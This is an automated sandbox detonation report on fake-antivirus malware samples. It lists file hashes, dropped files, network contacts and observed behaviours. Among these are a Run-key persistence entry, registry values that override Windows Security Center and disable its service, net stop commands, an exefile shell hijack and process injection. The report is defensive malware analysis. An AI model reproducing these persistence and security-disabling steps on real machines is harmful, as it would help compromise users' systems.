SHA256 5ae84ac103d09ce26a77380e25b5c53ae6b0acf7825a4310aba4ec16a0a61698
SHA512 3090f3e46d0d8e4cef31071592244e2b6a735d909c06f082dbe46e5643658198c8a1abcfcc1c359b0f834e8a1d32c646dd5f5da638fe9ee0112f0f877d930e4b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 4a17848095bea25aecfa2687952c96c6
SHA1 fd49f9400efcac4ed473c742f6851563e0ec1cde
SHA256 ab3f4158cf1e2f64477e4e3b142ef5e6e056d07d4d336645127f70e1263d154c
SHA512 143291ace88842560a5f0b24402f9301fcca2c4f6893762d5927520edad1d1618d87736f94ffacb91a346d20823274785cdbf46854f659b37a7862bdf0dc222a

Analysis: behavioral5

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antivirus = "\"C:\\Program Files (x86)\\AnVi\\avt.exe\" -noscan" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\AnVi\splash.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File created C:\Program Files (x86)\AnVi\virus.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 2004 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2004 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2004 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2004 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 2628 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2628 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2628 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2628 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2500 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2500 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2500 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2500 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2380 wrote to memory of 2540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2380 wrote to memory of 2540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2380 wrote to memory of 2540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2380 wrote to memory of 2540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2232 wrote to memory of 2428 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2232 wrote to memory of 2428 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2232 wrote to memory of 2428 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2232 wrote to memory of 2428 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\net.exe

net stop winmgmt /y

C:\Windows\SysWOW64\net.exe

net start winmgmt

C:\Windows\SysWOW64\net.exe

net start wscsvc

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start winmgmt

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop winmgmt /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wscsvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 searchdusty.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 highway-traffic.com udp
US 8.8.8.8:53 frequentwin.com udp
CA 54.39.157.64:80 searchdusty.com tcp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 computernewb.com udp
US 104.21.69.77:443 computernewb.com tcp
US 104.21.69.77:443 computernewb.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.57.101:443 static.cloudflareinsights.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

MD5 7fad92afda308dca8acfc6ff45c80c24
SHA1 a7fa35e7f90f772fc943c2e940737a48b654c295
SHA256 76e19416eb826a27bdcf626c3877cf7812bbe9b62cc2ccc5c2f65461d644246f
SHA512 49eed1e1197401cb856064bf7fdbd9f3bc57f3c864d47f509346d44eed3b54757d8c6cdb6254990d21291065f0762d2a1588d09e43c5728f77a420f6a8dcd6ea

memory/2004-16-0x000000006F8A0000-0x000000006FBB2000-memory.dmp

memory/2004-17-0x00000000078C0000-0x00000000078C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabAFD1.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarB1BC.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U4VLHPRO\pixelplay[1].woff

MD5 b49e517a8e3605250d8a4231554c1b57
SHA1 6da51af721bbb147c682f64c130ad97e336d1179
SHA256 86f273658594b1fc14337bff6945402bc90cc6b67989b757d0146d83bb07260d
SHA512 d4ce376ee0af2244de6ca039bafffa627cb5f795951d9cc4d2f01a0e65f5804d18909148f057edbc0f645072229120dbb8b31165254279fd6bbacf0c9a9acc66

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NXAFS242\v84a3a4012de94ce1a686ba8c167c359c1696973893317[1].js

MD5 dd1d068fdb5fe90b6c05a5b3940e088c
SHA1 0d96f9df8772633a9df4c81cf323a4ef8998ba59
SHA256 6153d13804862b0fc1c016cf1129f34cb7c6185f2cf4bf1a3a862eecdab50101
SHA512 7aea051a8c2195a2ea5ec3d6438f2a4a4052085b370cf4728b056edc58d1f7a70c3f1f85afe82959184869f707c2ac02a964b8d9166122e74ebc423e0a47fa30

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IKDEMF4Q\index[1].js

MD5 d6ccc01f5e7ffed0e34b710cc8f94aea
SHA1 d8eebefa67f1b3ba5b4774450514063e2f5f0e84
SHA256 13fee64f85f9ed03819cfb90371daea36ab141bc8b6d109b54d6f88dd15b9928
SHA512 606b29db366da0738e5c918b7e872c1882ddd5ebec106179f2b599694aad1bca03833940cf11aa9fcef77d555ac89de573f6c358c083d9162e899a682df2ec58

memory/2004-114-0x000000006F8A0000-0x000000006FBB2000-memory.dmp

memory/2004-115-0x00000000078C0000-0x00000000078C1000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

134s

Command Line

C:\Windows\system32\svchost.exe -k NetworkService

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection N/A N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusOverride = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\Svc\FirewallOverride = "1" C:\Windows\system32\svchost.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\userinit\ImagePath = "\\\\.\\globalroot\\systemroot\\system32\\usеrinit.exe" \??\globalroot\systemroot\system32\usеrinit.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"exefile\" /shell <%1> %*" C:\Windows\system32\svchost.exe N/A

Checks installed software on the system

discovery

Checks registry for disk virtualization

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK C:\Windows\system32\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Windows\system32\svchost.exe N/A
Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Windows\system32\svchost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT \??\globalroot\systemroot\system32\usеrinit.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2124 set thread context of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe
PID 2520 set thread context of 272 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI C:\Windows\system32\svchost.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\svchost.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
